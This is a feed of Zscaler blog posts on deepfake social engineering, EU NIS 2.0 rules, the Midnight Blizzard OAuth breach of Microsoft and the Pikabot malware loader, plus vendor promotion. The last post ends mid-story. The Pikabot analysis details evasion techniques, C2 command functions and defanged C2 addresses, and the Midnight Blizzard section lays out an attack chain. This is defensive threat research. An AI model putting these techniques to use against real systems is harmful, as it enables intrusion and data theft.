The social engineering techniques used by adversaries have continuously evolved and usually these adversaries are faster to adopt new technologies for their benefit than we, the defenders, are to protect their victims. You can see examples of this in the not too distant past: In times of modem connectivity, a common piece of malware would dial up a modem in the middle of the night and connect it to a toll number, leading to enormous bills. A few years ago, a rash of malicious android apps hacked mobile phones to dial toll numbers as a way to make quick and easy money – which was basically a modern form of the old modem dialer tactic. Cryptominers harvesting the compute powers of infected systems was then the next step in this evolution.
The human risk factor
History has shown us a number of examples of the old social engineering playbook in use. The technique of faking a senior executive‘s voice by reusing publicly available audio clips to threaten users into taking action is already fairly well known. Faking video sessions showing a range of people in a live and interactive call, however, reaches a new (and scary) level of cybercriminal sophistication and has therefore sown a new level of appropriate and respectful fear around AI’s technological evolution. It is the perfect demonstration of how easily humans can be tricked or coerced into taking action – and of bad actors using this to their advantage. But this attack also highlights how a new piece of technology can enable adversaries to do the same tasks they have been doing before, but more efficiently. And bad guys are taking advantage of this technological advancement fast.
Unfortunately, the general public is still not fully aware of how social engineering techniques continue to evolve. They don't follow security news and trust that these kinds of attacks will never happen to them. This is what makes traditional security awareness training difficult to prove effective, the public doesn’t believe they (as individuals) will be targeted. So when it does happen, they are unprepared and are duped into falling prey to the social engineering attack.
In the wake of this recent attack questions were also raised about how – if AI is really good enough to make these video scenarios look so realistic – an employee would have any chance of detecting the fake. The fact is that human beings are not machines, and they will always be a risk factor as an organisation‘s first line of defence because they will have a variable level of security awareness (no matter how good the internal training process might be). Imagine if someone has a bad night or returns home late from a business trip or sports event. They simply might not be as laser-focused on detecting modern social engineering techniques or paying attention to the details the following day. The big challenge is that AI won’t have an off day – its targeting will remain consistent.
The technology to fight these playbooks already exists – but it is not widely used
The fact that these kind of plays keep working shows that businesses have not yet adapted their security and organisational processes to handle them. One way to counteract deep fakes videos starts at the (security) process level.
My first idea is a simple one: to ensure that teleconferencing systems include a function to authenticate a logged-on user as a human being. A straightforward plug-in could do the job, employing two-factor authentication to verify an identity within Zoom or Teams, for example. Hopefully such an API would be fairly easy to develop and would be a huge step forward in preventing sniffing attacks via the phone as well.
Additionally, the mindset about being afraid of AI has to change. It is an amazing piece of technology, not only when it is misused. Society just needs to understand its boundaries. AI can actually be implemented to stop these sorts of modern attacks if security executives learn how to control the problem and use the technology to get ahead of the bad actors. Deception technologies already exist, and AI can be used to detect anomalies much faster and more effectively, showing its potential for good.
From a more all-up security perspective, adapting a Zero Trust mentality for security can enable organisations to continually improve their security posture on the process level. Zero Trust could not only help on a connectivity level, but it could also improve security workflows, which helps to verify whether everyone in a call is authenticated against an internal directory. Zscaler‘s Identity Threat Detection and Response (ITDR) is already mitigating threats that are targeting a user’s identity. With the help of the new service, the risk to identities is becoming quantifiable, misconfigurations are being detected, and real-time monitoring and privileged escalations are helping to prevent breaches.
Finally – going back to the initial example of the successful deepfake – it is hard to believe that you can transfer so much money in a modern organization without verification processes operating in the background. Organisations would be well advised to check the overall risk level of such processes within their own infrastructure. It would raise the barriers to an attack greatly, if solid administrative processes were put in place to reduce risk – not only in the security organisation, but for operational processes like payments authentication as well. Not everything needs to be enhanced by a technological solution. Sometimes a new procedure where two people must sign off on a funds transfer could be the step which protects the organization from losing $25m USD.
Tue, 20 2月 2024 05:54:06 -0800James Tuckerhttps://www.zscaler.jp/blogs/company-news/the-old-social-engineering-playbook-now-with-aiNIS 2.0 - New Cybersecurity Rules In the EU
https://www.zscaler.jp/blogs/company-news/nis-2-0-new-cybersecurity-rules-eu
Back in 2021, the White House issued an executive order compelling federal government agencies to develop a plan for implementing a zero trust architecture. This was followed by a memorandum that mandated federal agencies to achieve specific zero trust security goals by the end of 2024.
Last year, as you may have heard, the SEC in the United States issued new rules compelling publicly traded companies to disclose material cybersecurity breaches. As it’s happened, the SEC has wasted no time in showing its regulations have teeth, with the first prosecutions having already taken place.
So, there’s a lot going on in the USA, but it’s not the only place in the world where policymakers are pushing for—or even mandating—the adoption of zero trust principles. This year the European Union will be updating and tightening its Network and Information Systems (NIS) directive, and as anyone who experienced the arrival of the GDPR regulations on privacy will tell you, the reach of EU regulations can be great indeed.
NIS 2.0
The NIS 2.0 directive comes into force in October 2024, mandating that management bodies within organizations in specific categories implement cybersecurity risk management measures. Impacted categories extend to:
Energy
Transport
Banking
Financial market infrastructure
Health
Drinking water
Wastewater
Digital infrastructure
ICT service management (B2B)
Public administrations
Space
Postal and courier services
Waste management
Manufacture, production, and distribution of chemicals
Food production, processing, and distribution
Manufacturing
Digital providers
Research
As you can see, the directive is focused on critical physical and digital infrastructure within EU member states, but it also has reach. It applies not only to organizations within the EU, but also to any organization worldwide that provides services to any of the protected sectors within the EU. As with the SEC regulations, there are strict rules for prompt incident reporting.
The stick
The picture is abundantly clear at this point. Government bodies in regions covering hundreds of millions of citizens have recognized that the risk of inadequate cybersecurity practices is severe enough to warrant strict regulations and even severe penalties. The carrot has been in place for many years—now comes the stick!
The carrot
So, what’s the carrot? What are the positive aspects to strengthening your security defenses? Sure, it starts with reducing cyberattack risk and achieving compliance, but what else? Organizations that implement robust cybersecurity practices stand to gain significantly in terms of cost reduction, competitiveness, business continuity, and customer trust. Not just one carrot, but a whole bunch!
Help is at hand. The NIS 2.0 directive itself includes clear guidance on how to improve your cybersecurity stance, and you won’t be surprised to learn that the first recommended cyber hygiene practice listed is the adoption of zero trust principles. In fact, as you review these lengthy regulatory and legal requirements, zero trust comes up routinely as the holy grail to aim for.
“Users should log into applications, rather than networks”
Help is also available from Zscaler, where we’ve been designing and building the foundational pillars of a zero trust architecture since 2007. If you’d like to speak to someone about implementing zero trust and achieving regulatory compliance, whatever your industry, please get in touch. Alternatively, join one of our monthly introductory webinars to learn more and ask questions. Click here and search ‘start here’ to find the next session to sign up for.
Tue, 20 2月 2024 00:00:02 -0800Simon Tompsonhttps://www.zscaler.jp/blogs/company-news/nis-2-0-new-cybersecurity-rules-euMicrosoft, Midnight Blizzard, and the Scourge of Identity Attacks
https://www.zscaler.jp/blogs/product-insights/microsoft-midnight-blizzard-and-scourge-identity-attacks
Summary
On January 19, 2024, technology leader Microsoft disclosed that it had fallen victim to a Russian state-sponsored cyberattack that gave the threat actors access to senior management mailboxes and resulted in sensitive data leakage.
While we will break down the attack step-by-step and explain what organizations can do to defend against similar attacks below, here’s a TL;DR.
The threat actor
Midnight Blizzard: State-sponsored Russian threat actor also known as Nobelium, CozyBear, and APT 29
Notable Midnight Blizzard breaches: Hewlett Packard Enterprise (December 12, 2023) and SolarWinds (December 14, 2020)
The facts
Attack target: Microsoft’s Entra ID environment
Techniques used: Password spraying, exploiting identity and SaaS misconfigurations
Impact: Compromised Entra ID environment, unauthorized access to email accounts of Microsoft’s senior leadership team, security team, legal, and more
What’s unique about the attack?
Using stealthy identity tactics that bypasses existing defenses to compromise users
Exploiting misconfigurations in SaaS applications to gain privileges
Exploiting identity misconfigurations in Entra ID to escalate privileges
The attack sequence
Found a legacy, non-production test tenant in Microsoft’s environment.
Used password spraying via residential proxies to attack the test app tenant.
Limited the number of attack attempts to stay under the threshold and evade blocking triggered by brute forcing heuristics.
Guessed the right password and compromised the test tenant’s account.
Generated a new secret key for the Test App that allowed the threat actor to control the app every where it was installed.
Test App was also present in the corporate tenant. Threat actor used the app’s permissions to create an admin user in the corporate tenant.
Used the new admin account to create malicious OAuth apps.
Granted the malicious app the privilege to impersonate the users of the Exchange service.
Used the malicious app to access Microsoft employee email accounts.
Microsoft’s official guidance
Defend against malicious OAuth applications
Audit privileged identities and apps in your tenant
Identify malicious OAuth apps
Implement conditional access app control for unmanaged devices
Protect against password spray attacks
Eliminate insecure passwords
Detect, investigate, and remediate identity-based attacks
Enforce multi factor authentication and password protections
Investigate any possible password spray activity
Zscaler’s guidance
Continuously assess SaaS applications for misconfigurations, excessive permissions, and malicious changes that open up attack paths.
Continuously assess Active Directory and Entra ID (previously known as Azure AD) for misconfigurations, excessive permissions, and malicious changes that open up attack paths.
Monitor users with risky permissions and misconfigurations for malicious activity like DCSync, DCShadow, kerberoasting, etc. that is typically associated with an identity attack.
Implement containment and response rules to block app access, isolate the user, or quarantine the endpoint on an identity attack detection.
Implement deception to detect password spraying, Entra ID exploitation, Active Directory exploitation, privilege escalation, and lateral movement for instances where stealthy attacks bypass existing detection and monitoring controls.
Deconstructing the attack
The threat actor Midnight Blizzard has had a long history of pulling off highly publicized breaches. It’s Microsoft this time around, but in the past, they’ve allegedly compromised Hewlett Packard Enterprise and SolarWinds. To people who analyze attacks for a living, the Microsoft breach should not come as a surprise.
Midnight Blizzard is among a growing list of nation-state and organized threat actors that rely on identity compromise and exploiting misconfigurations/permissions in SaaS applications and identity stores to execute breaches that conventional security thinking cannot defend against.
Other threat groups using these strategies and techniques include Evil Corp, Lapsus$, BlackMatter, and Vice Society.
In case of the Microsoft breach, the attackers demonstrated a profound understanding of OAuth mechanics and attack techniques to evade detection controls. They created malicious applications to navigate Microsoft's corporate environment. And by manipulating the OAuth permissions, they granted themselves full access to Office 365 Exchange mailboxes, enabling them to easily exfiltrate sensitive emails.
Security challenges
Identity-centric tactics: Midnight Blizzard strategically targeted identities, exploiting the user's credentials as a gateway to sensitive data. Conventional detection controls like EDRs are not effective against such attacks.
OAuth application abuse: The adversaries adeptly abused OAuth applications, a technique that complicates detection and enables prolonged persistence.
Misconfiguration blind spots: Identifying misconfigurations within Active Directory/Entra ID and SaaS environments remains a complex task, often resulting in blind spots for defenders.
Step-by-step breakdown
Pre-breach
Before the attack commenced, an admin within Microsoft's test tenant had created an OAuth app. For the purpose of this blog post, let’s call this app ‘TestApp.’
For reasons unknown, this app was subsequently installed in Microsoft's corporate environment with elevated permissions, likely encompassing the scope Directory.ReadWrite.all, granting it the capability to create users and assign roles. Notably, this app appeared to be dormant and possibly forgotten.
ThreatLabz note: There is an unimaginable sprawl of applications, users, and associated misconfiguration and permissions that security teams often have no visibility into. More often than not, blind spots like these are what result in publicized breaches.
Initial access
In late November 2023, Midnight Blizzard initiated reconnaissance on Microsoft's SaaS environment. Discovering the test tenant, the attacker targeted its admin account, which, being a test account, had a weak, guessable password and lacked multi-factor authentication (MFA). Employing a password spraying attack, the attacker systematically attempted common passwords to gain access, leveraging residential proxies to obfuscate their origin and minimize suspicion. Eventually, the attacker successfully compromised the admin account.
ThreatLabz note: Traditional threat detection and monitoring controls are ineffective against attacks that use valid credentials, MFA-prompt bombing, and other identity-centric techniques to compromise users.
Persistence
With control over the admin account, the attacker obtained the ability to generate a new secret key for TestApp, effectively commandeering it across all installations. This tactic mirrors techniques observed in the SolarWinds attack of 2020.
ThreatLabz note: In the absence of continuous monitoring and high-confidence alerting for malicious changes being made to permissions in SaaS applications, attacks like these easily cross the initial access phase of the kill chain.
Privilege escalation
Given TestApp's permissions within Microsoft's corporate tenant, the attacker created a new user, likely an administrator, to further their access. Subsequently, the attacker deployed additional malicious OAuth apps within the tenant to evade detection and ensure persistence, leveraging TestApp to grant elevated roles, such as Exchange role EWS.full_access_as_app, facilitating mailbox access and bypassing MFA protection.
ThreatLabz note: Configuration and permission based blindspots extend to identities themselves. As such, it is imperative that organizations have the ability to continuously assess their Active Directory/Entra ID for misconfigurations, excessively permissive policies, and other permissions that give attackers the ability to escalate privileges from a compromised identity. They should also continuously monitor for malicious changes in the identity store that might potentially be creating additional attack surfaces.
Lateral movement
Though specifics regarding the number and origin of installed apps remain unclear, the attacker's utilization of TestApp to confer privileges is evident. This culminated in unauthorized access to mailboxes belonging to Microsoft's senior leadership, security personnel, legal team, and other stakeholders.
How zero trust can help
A zero trust architecture provides a fundamentally secure approach that is better at protecting against stealthy attacks that are used by nation-state threat actors and organized adversaries.
Zero trust fundamentally eliminates weaknesses in your environment that are core properties of hub and spoke network models.
Below is a 10,000 foot reference architecture for zero trust that explains how and why it better protects against Midnight Blizzard-style attacks.
Core zero trust capabilities
This is the heart of a zero trust architecture consisting of Internet Access and Private Access. The Zero Trust Exchange acts as a switchboard brokering all connections between users and applications. This architecture makes your applications invisible to the Internet, thereby eliminating the external attack surface, replaces high-risk VPNs, and uses segmentation to reduce lateral threat movement and internal blast radius. To broker the connection, the Zero Trust Exchange verifies the identity, determines the destination, assesses risk, and enforces policy.
ThreatLabz note: Zscaler extends core zero trust capabilities with SaaS supply chain security, Identity Posture Management, ITDR, Deception, and Identity Credential Exposure to eliminate application and identity misconfigurations, detect stealthy attacks, and provide visibility into exposed credentials on endpoints to remove lateral movement paths. Below, we breakdown what each of these capabilities can do.
SaaS Security
While the move to the cloud and SaaS applications has aided organizations to accelerate their digital transformation, it has also created a new set of security challenges. Among these, the lack of visibility into dangerous backdoor connections to SaaS applications is paramount as it creates supply chain risk — the kind that was exploited in the Microsoft breach.
SaaS Security strengthens your security posture by providing visibility into third-party application connections, over-privileged access, risky permissions, and continuous monitoring for changes that can be malicious in nature. It is a core step in securing your SaaS environment.
Identity Posture Management
Nine in ten organizations are exposed to Active Directory attacks and there has been a 583% increase in Kerberoasting and similar identity attack techniques in 2023 alone. These are not isolated phenomena. Misconfigurations and excessive permissions in Active Directory and other identity providers are what enable these types of attacks. For example, an unprivileged account without MFA having the ability to control an application with privileged roles should be flagged, but most security teams do not have appropriate visibility into these types of misconfigurations.
Identity Posture Management augments zero trust by providing security teams visibility into identity misconfigurations, policies, and permissions that open up potential attack paths. With periodic assessments, security teams can leverage remediation guidance to revoke permissions, limit policies, and remove misconfigurations. Identity Posture Management also alerts security teams to malicious changes in the Active Directory in real time.
Deception and ITDR (Identity Threat Detection and Response)
As evidenced in the Microsoft breach, attackers used password spraying from a residential proxy and limited the number of tries to evade detection. Traditional threat detection and monitoring approaches just do not work here. Deception, on the other hand, is a pragmatic approach that can detect these attacks with fairly high confidence. Decoy users created in Entra ID can detect such password spraying attacks without false positives or the need to write complex detection rules.
ITDR can detect identity-specific attacks like DCSync, DCShadow, and Kerberoasting that would otherwise require detection engineering and significant triage to spot.
Identity Credential Exposure
While TTPs (Techniques, Tactics, and Procedures) were not reported for credential exploitation, credentials and other sensitive material (like username, passwords, authentication tokens, connection strings, etc.) on the endpoint in files, registry, and other caches are something that threat actors like Volt Typhoon, Scattered Spider, BlackBasta, BlackCat, and LockBit are known to have exploited in publicly reported breaches.
Identity Credential Exposure provides security teams with visibility into credential exposure across their endpoint footprint, highlighting blind spots that open up lateral movement and data access paths from the endpoint.
Zero trust creates multiple opportunities to detect and stop Midnight Blizzard-style attacks
Problem
Solution
How does it work?
MITRE ATT&CK Technique
Password spraying
Zscaler Deception
Decoy user accounts in Entra ID can detect any attempts to sign in using the credentials of the decoy users. Any failed/successful attempts will be logged to detect attacks like password spraying
T1110.003 - Brute Force: Password Spraying
T1078.004 - Valid Accounts: Cloud Accounts
Existence of apps/SPNs with high privilege
Zscaler ITDR
ITDR can surface unprivileged accounts that have a path (e.g., owner rights) to apps with privileged roles
NA
Creation of apps/SPNs with high privilege
Zscaler SaaS Security
Monitoring for and alerting when a risky app is added, app is created by an unverified publisher, and when an app hasn’t been used in a while
There is no technique that maps to this but in terms of the nature of the technique, the ones listed below are a close approximation of how you think of the attack.
T1136.003 - Create Account: Cloud Account
T1098.003 - Account Manipulation: Additional Cloud Roles
Creation/modification of users with high privileges
Zscaler ITDR
Monitoring of an alerting on unauthorized addition of privileged permissions to principals
T1136.003 - Create Account: Cloud Account
T1098.003 - Account Manipulation: Additional Cloud Roles
Secret addition to apps
Zscaler SaaS Security
Flags applications with multiple Application Secrets
T1098.001 - Account Manipulation: Additional Cloud Credentials
Disabled MFA
Zscaler ITDR
Find accounts where MFA is disabled and get alerts when MFA is disabled for any account
T1556.006 - Modify Authentication Process: Multi-Factor Authentication
Consent grants
Zscaler SaaS Security
Monitors inclusion of high risk scopes like EWS.full_access_as_app or EWS.AccessAsUser.All to alert on the app’s risk level
T1098.003 - Account Manipulation: Additional Cloud Roles
T1098.002 - Account Manipulation: Additional Email Delegate Permissions
What should I do next?
Identity is the weakest link. Irrespective of whether you are running a zero trust architecture or not, start by getting visibility into identity misconfigurations and excessive permissions that can allow attackers to grant themselves privileges. We’re offering a complimentary Identity Posture Assessment with Zscaler ITDR.
Gain visibility into your SaaS sprawl and find dangerous backdoor connections that can give attackers the ability to establish persistence. Request an assessment with Zscaler SaaS Security.
Implement Deception irrespective of what other threat detection measures you have. It is one of the highest ROI threat detection controls that you can implement, augmenting controls like EDR. Zscaler Deception has a comprehensive set of decoys that can deceive and detect sophisticated attackers.
If you are a Zscaler customer, contact your account manager for support on these assessments and Deception rollout.
Tue, 13 2月 2024 17:10:20 -0800Amir Moinhttps://www.zscaler.jp/blogs/product-insights/microsoft-midnight-blizzard-and-scourge-identity-attacksThe (D)Evolution of Pikabot
https://www.zscaler.jp/blogs/security-research/d-evolution-pikabot
Introduction
Pikabot is a malware loader that originally emerged in early 2023. Over the past year, ThreatLabz has been tracking the development of Pikabot and its modus operandi. There was a significant increase in usage of Pikabot in the second half of 2023, following the FBI-led takedown of Qakbot. This was likely the result of a BlackBasta ransomware affiliate replacing Qakbot with Pikabot for initial access. However, Pikabot ceased activity shortly after Christmas 2023, with its version number being 1.1.19 at that time.
In recent campaigns, which started in February 2024, Pikabot reemerged with significant changes in its code base and structure. Although it appears to be in a new development cycle and testing phase, the developers have reduced the complexity of the code by removing advanced obfuscation techniques and changing the network communications.
Key Takeaways
Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023.
In December 2023, Pikabot activity ceased, possibly as a result of a new version of Qakbot that emerged. In February 2024, a new version of Pikabot was released with significant changes.
Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms.
Pikabot now stores all configuration elements in a single memory block, similar to Qakbot. In prior versions, Pikabot decrypted necessary configuration elements only when required.
Pikabot continues to use HTTP for command-and-control, but its network protocol has changed, including the network command IDs and the encryption algorithms.
Technical AnalysisAs covered in our previous technical analysis of Pikabot, the malware consists of two components: a loader and a core module. The core module is responsible for executing commands and injecting payloads from a command-and-control server. The malware uses a code injector to decrypt and inject the core module. It employs various anti-analysis techniques and string obfuscation. Pikabot uses similar distribution methods, campaigns, and behaviors as Qakbot. The malware acts as a backdoor, allowing the attacker to control the infected system and distribute other malicious payloads such as Cobalt Strike.In the following sections, we will describe the latest Pikabot variant, including its capabilities and notable changes compared to previous versions. The analysis was performed on Pikabot binaries with version 1.8.32.Anti-analysis techniquesAs with previous versions of Pikabot, this variant employs a series of different anti-analysis techniques to make the analysis more time-consuming. It should be noted that none of the methods below presents any significant advanced capabilities. Furthermore, Pikabot used a series of more advanced detection features in its loader component in previous versions of the malware.Strings encryptionThe most notable change is the string obfuscation. In previous versions of Pikabot, each string was obfuscated by combining the RC4 algorithm with AES-CBC. This method was highly effective in preventing analysis, particularly when it came to automated configuration extraction. To successfully analyze Pikabot, an analyst would need to detect not only the encrypted string but also its unique RC4 key. Additionally, they would need to extract the AES key and initialization vector, which are unique to each Pikabot payload.It should be noted that the approach the Pikabot malware developers followed is similar to the ADVobfuscator.In the latest version of Pikabot, the majority of the strings are either constructed by retrieving each character and pushing it onto the stack (Figure 1) or, in some rare cases, a few strings are still encrypted using the RC4 algorithm only.Figure 1. String stack constructionJunk instructionsThis anti-analysis technique was also implemented in previous versions of Pikabot. Pikabot inserts junk code between valid instructions. The junk code is either inlined in the function or a call is made to a function, which contains the junk code (Figure 2).Figure 2. Junk codeAnti-debug methodsPikabot uses two methods to detect a debugging session. They are:Reading the BeingDebugged flag from the PEB (Process Environment Block).Calling the Microsoft Windows API function CheckRemoteDebuggerPresent.Pikabot constantly performs the debugging checks above in certain parts of its code. For example, when it (en/de)codes network data or when it makes a request to receive a network command.Anti-sandbox evasionIn addition to the anti-debugging checks above, Pikabot uses the following methods to evade security products and sandboxes:Pikabot utilizes native Windows API calls.Pikabot delays code execution at different stages of its code. The timer is randomly generated each time.Pikabot dynamically resolves all required Windows API functions via API hashing.A Python representation of the algorithm is available below.Language detectionIdentical to previous versions, Pikabot stops execution if the operating system's language is any of the following:Russian (Russia)Ukrainian (Ukraine)This is likely an indication that the threat actors behind Pikabot are Russian-speaking and may reside in Ukraine and/or Russia. The language check reduces the chance of law enforcement action and potential criminal prosecution in those regions.Bot initialization phaseUnlike previous versions, this version of Pikabot stores all settings and information in a single structure at a global address (similar to Qakbot). The analyzed structure is shown below. For brevity, we redacted non-important items of the structure (such as Windows API names).Bot configurationThe latest version of Pikabot stores its entire configuration in plaintext in one address. This is a significant drawback since in previous versions, Pikabot decrypted each required element at runtime and only when required. In addition, many of the configuration elements (e.g. command-and-control URIs) were randomized. ANALYST NOTE: Despite their randomization, all configuration elements were valid on the server-side. If a bot sent incorrect information, then it would get rejected/banned by the command-and-control server.The configuration structure is the following:Once Pikabot parses the plaintext configuration, it erases it by setting all bytes to zero. We assess that this is an anti-dumping method to avoid automating the extraction of the configuration.Lastly, Pikabot loads any remaining required Windows API functions and generates a bot identifier for the compromised host. The algorithm is similar to previous versions and can be reproduced with the following Python code.ANALYST NOTE: In some samples, Pikabot does not read the volume serial number due to a bug in their code that causes a failure when calling GetVolumeInformationW.Network communicationsPikabot contacts the command-and-control server to request and receive network commands. In this version, the network protocol has considerably changed. Pikabot starts by registering the compromised host to its server. First, Pikabot collects information from the compromised host, such as:Monitor’s display settingsWindows versionHostname/username and operating system’s memory sizeBeacon and delay settingsProcess information such as the process ID, parent process ID and number of threads (see the description of network command 0x985 for a comprehensive list).Bot’s version and campaign nameName of the domain controllerThen Pikabot appends the following information to the registration packet:32-bytes network RC4 key (unique per host), which remains the same for the session. In previous versions, Pikabot was using AES-CBC with a random key/IV per request.Unknown registry key name. We observed it used only in the network command with ID 0x246F.Number of swap rounds used for encoding the data. This remains the same for the rest of the session.Next, Pikabot encrypts the data using the RC4 algorithm, encodes the encrypted output, picks a random URI from its list, and sends the data with a POST request to the command-and-control server.The encoding involves bytes swapping for N times, where N is a randomly generated number in the range 0-25.ANALYST NOTE: Despite the fact that a round number is set in the configuration (see the configuration structure), this value is ignored and Pikabot replaces it with a random value. Moreover, Pikabot has completely removed the JSON format in its network packets and inserts everything in a raw format.If the bot registration is successful, Pikabot starts an infinite loop to request and execute commands. Each incoming network command (with the exception of network command with ID 0x164) has a task ID that is placed at the start of the (decrypted) packet as a QWORD value. In Table 1 below, we list the identified network commands along with a description of their functionality.Command IDDescription0x164Requests command from command-and-control server. The packet includes the command ID, size of bot ID, and the bot ID. The server replies with the same command ID if there is no network command for the bot to execute.0x555Reports the output of the executed network command to the command-and-control server.0x1291Registers the bot. An unknown integer value (0x1687) is appended in the packet at offset 8.0x1FEDUpdates beacon time.0x1A5ATerminates/kills the bot.0x2672Not implemented0x246FWrites a file to disk and adds registry data using the value name specified in the configuration (unknown_registry_key_name).0xACBExecutes the system command and sends back the output. Includes the error code 0x1B3 if there is no output.0x36CInjects the code of a downloaded PE file. The target process information is specified in the network packet.0x792Injects the code of a downloaded shellcode. The target process information is specified in the network packet.0x359Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x3A6Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x240Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x985Collects processes’ information. These are:Executable's filenameProcess IDBoolean flag, which indicates if it is a Pikabot process.Boolean flag, which indicates if Pikabot can access the process with all possible access rights.Number of threadsBase priority of threadsProcess architectureParent process ID0x982Not implementedTable 1. Pikabot Network CommandsConclusion
Despite its recent inactivity, Pikabot continues to pose a significant cyber threat and is in constant development. However, the developers have decided to take a different approach and decrease the complexity level of Pikabot's code by removing advanced obfuscation features. Moreover, based on our code analysis, it appears that certain features and network commands have not been implemented yet and are still a work in progress.
Zscaler ThreatLabz continues to track this threat and add detections to protect our customers.
Indicators Of Compromise (IOCs)
SHA256
Description
555687ca3149e23ee980a3acf578e0572da556cf34c87aecf48596834d6b496f
Pikabot sample (version 1.8.32-beta)
ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d
Pikabot sample (version 1.8.32-beta)
IOC
Description
104.129.55[.]103:2224
Command-and-Control server
178.18.246[.]136:2078
Command-and-Control server
158.220.80[.]167:2967
Command-and-Control server
104.129.55[.]104:2223
Command-and-Control server
23.226.138[.]161:5242
Command-and-Control server
37.60.242[.]85:9785
Command-and-Control server
23.226.138[.]143:2083
Command-and-Control server
37.60.242[.]86:2967
Command-and-Control server
85.239.243[.]155:5000
Command-and-Control server
158.220.80[.]157:9785
Command-and-Control server
65.20.66[.]218:5938
Command-and-Control server
95.179.191[.]137:5938
Command-and-Control server
139.84.237[.]229:2967
Command-and-Control server
Zscaler Coverage
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names:
Win32.Trojan.PikaBot
Win32.Downloader.PikaBot
Mon, 12 2月 2024 10:11:52 -0800Nikolaos Pantazopouloshttps://www.zscaler.jp/blogs/security-research/d-evolution-pikabotStart Your Journey in IT Support: A Beginner's Guide
https://www.zscaler.jp/blogs/product-insights/start-your-journey-it-support-beginner-s-guide
Navigating the nuances of IT troubleshooting can be challenging, especially if you're just starting out. Our ebook, A Beginner’s Guide to Troubleshooting Devices, Networks, and Applications for Service Desk Teams, breaks down the essentials of IT support in a clear, digestible format, making it a great resource for newcomers who are eager to become influential service desk team members. It’s a practical guide even for those with limited time.
Whether you're dealing with device issues, network complexities, or application troubleshooting, you’ll find step-by-step instructions that are easy to follow even with minimal IT knowledge. We’ve designed this guide to help you enhance your troubleshooting skills, gain the confidence you need to master IT problem-solving, and become a valuable asset to any service desk team.
In this ebook, you'll find:
An overview of service desk challenges: Understand the evolving IT landscape and the pivotal role of IT support in maintaining productivity.
Step-by-step ticket resolution processes: Learn how to handle and resolve IT issues, enhancing customer satisfaction efficiently.
Categorization of IT issues: Familiarize yourself with common problems in devices, networks, and applications, along with strategies to tackle them.
A focus on device, networking, and application issues: Gain insights into specific challenges in these areas and learn practical solutions.
Strategies to enhance troubleshooting workflows: Discover how to streamline IT support processes and use advanced technologies for better problem-solving.
It’s also an excellent tool for service desk managers to expedite team onboarding. By equipping your team with this resource, you’ll enable them to handle a wide range of IT issues independently. It reduces the need for escalations and empowers analysts to solve problems efficiently. Ultimately, it can help not only enhance your service desk team’s capabilities, but also significantly shorten the time it takes for new analysts to become proficient.
Download the ebook today and transform your service desk team!
Fri, 09 2月 2024 19:14:07 -0800Rohit Goyalhttps://www.zscaler.jp/blogs/product-insights/start-your-journey-it-support-beginner-s-guideCushman & Wakefield’s Roadmap for Consolidating and Simplifying Security with Zscaler
https://www.zscaler.jp/blogs/customer-stories/cushman-wakefield-s-roadmap-consolidating-and-simplifying-security-zscaler
Cushman & Wakefield’s Roadmap for Consolidating and Simplifying Security with Zscaler
As a CISO leading the cybersecurity program at Cushman & Wakefield, one of the world's largest commercial real estate services firms, I can attest that it has been a truly transformative journey. When I joined the company over five years ago, I had clear priorities: improve SaaS application performance for our distributed, mostly mobile workforce, now more than 52,000 employees, simplify network architecture, and accelerate integration of mergers and acquisitions (M&As).
My vision was to evolve Cushman & Wakefield’s security approach from a legacy on-premises infrastructure to cloud-based security as a service. As we set our sights on a cloud-first and partner-first model, we aimed to shrink the size and number of our data centers. Our intent was to streamline our infrastructure and build a coordinated security ecosystem with an eye toward gaining operational efficiencies. Equally important was providing our globally dispersed users with faster, more secure access to the more than 200 SaaS applications they rely on every day. To achieve these goals, we turned to the Zscaler Zero Trust Exchange—and it has proven to be the perfect fit for our strategic vision. Zscaler has been at the core of our success and continues to be at the center of our ongoing security transformation journey.
A phased approach to our Zscaler implementation
In 2019, we made a strategic decision to adopt SD-WAN to improve SaaS connectivity across our more than 400 branch offices. That’s when we adopted Zscaler. We selected Zscaler Internet Access (ZIA), part of the Zero Trust Exchange, as our security solution because it interoperates seamlessly with the SD-WAN and enables secure local internet breakouts without the high costs and complexity of on-premises firewall appliances. The joint solution provided consistent protection and significantly better performance for our users on any device anywhere. Additionally, our security team had complete visibility over what was happening on the network and who was using which applications. This allowed us to manage bandwidth and prioritize traffic to business-critical applications and limit the impact of streaming and social media traffic.
We’re continuing to modernize our branch offices but are moving to a café model, where users can securely connect to corporate resources without VPN or SD-WAN. Zscaler is making this change possible. Looking ahead, we also plan to implement Zscaler Private Access more broadly to provide secure access to private applications as we establish offices in new regions.
Following the user during the pandemic and beyond
At every stage of our implementation, we found that Zscaler delivered value in new ways. Even before the COVID-19 pandemic, a significant portion of our workforce was operating remotely. When the pandemic struck, we were well prepared. Zscaler Client Connector had already been deployed on all devices, so we maintained business continuity. When a leader asked me what my plan was for security at the time, I just shrugged my shoulders and informed him that we already had all our bases covered with Zscaler and Crowdstrike being the primary components.
Zscaler integrations for a coordinated security ecosystem
After the positive experience we had with the Zscaler integration, we are impressed with how easy and seamless it is to integrate other tools in our security stack with Zscaler. Recently, we integrated Zscaler with CrowdStrike for an added layer of protection: Zscaler only allows devices that meet CrowdStrike’s Zero Trust Assessment (ZTA) score threshold to access sensitive applications. By sharing real-time threat intelligence, data alerts, and device health information, the Zscaler-CrowdStrike integration has reduced the number of security events.
As we move forward with building out our zero trust architecture and creating a unified security ecosystem, we plan to leverage Zscaler’s open API more fully to maximize our other security investments. We’re looking at ways to broaden threat intelligence sharing, gain more visibility, and engage automation to a greater degree. At the top of my to-do list are integrating with CrowdStrike Falcon LogScale, its next-generation SIEM and log management tool, and with Mimecast, the cloud-based email security and management system used by all our employees..
Future focus: expanding Zscaler capabilities
Risk management
I also look forward to evaluating the new AI-powered capabilities like Zscaler Risk360 to gain visibility into risk in all areas of our environment. Once it’s in place, Zscaler Risk360’s visualization framework will generate risk posture profiles using real data in our environment combined with global security research from Zscaler ThreatLabz. The ability to quickly identify and respond to critical vulnerabilities will enhance our proactive protection, enable us to communicate security priorities in a quantifiable way, and help us build a data-driven case as we advocate for additional resources.
M&A integration
